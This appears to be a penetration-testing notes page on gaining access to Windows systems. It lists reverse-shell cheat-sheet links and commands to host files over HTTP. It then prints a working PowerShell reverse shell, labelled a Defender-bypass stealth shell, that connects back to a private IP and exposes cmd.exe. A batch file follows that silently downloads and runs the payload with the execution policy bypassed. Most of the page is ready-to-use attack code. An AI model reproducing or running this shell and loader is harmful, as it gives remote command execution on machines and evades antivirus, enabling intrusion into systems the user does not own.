1. Gain access to the system

1. Reverse Shell Payload Cheatsheets

MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)Infinite Logins

Page not found - HackTricksbook.hacktricks.xyz

PayloadsAllTheThings/Methodology and Resources/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Reverse Shell Cheat Sheetpentestmonkey

GitHub - danielmiessler/SecLists: SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.GitHub

2. php and python server

sudo php -S 0.0.0.0:80
python3 -m http.server 80

3. Defender Bypass Stealth Shell with Admin Privilege

power shell payload

function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '192.168.177.128'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

Bat File which access powershell Payload from the server

@echo off

:: Check for admin privileges
net session >nul 2>&1
if %errorLevel% neq 0 (
    echo Please run this script with administrative privileges.
    pause
    exit /b
)

:: Actual PowerShell command
powershell -nop -NoProfile -ExecutionPolicy Bypass -W Hidden -Command "(New-Object Net.WebClient).DownloadString('http://192.168.177.128/ps.txt') -replace '//.*' | Invoke-Expression"

Check current user Privilege on Windows

whoami /priv

Previous4. System Hacking Next2. Privilege Escalation

Last updated 2 years ago

hashtag1. Reverse Shell Payload Cheatsheets

hashtag2. php and python server

hashtag3. Defender Bypass Stealth Shell with Admin Privilege

1. Reverse Shell Payload Cheatsheets

2. php and python server

3. Defender Bypass Stealth Shell with Admin Privilege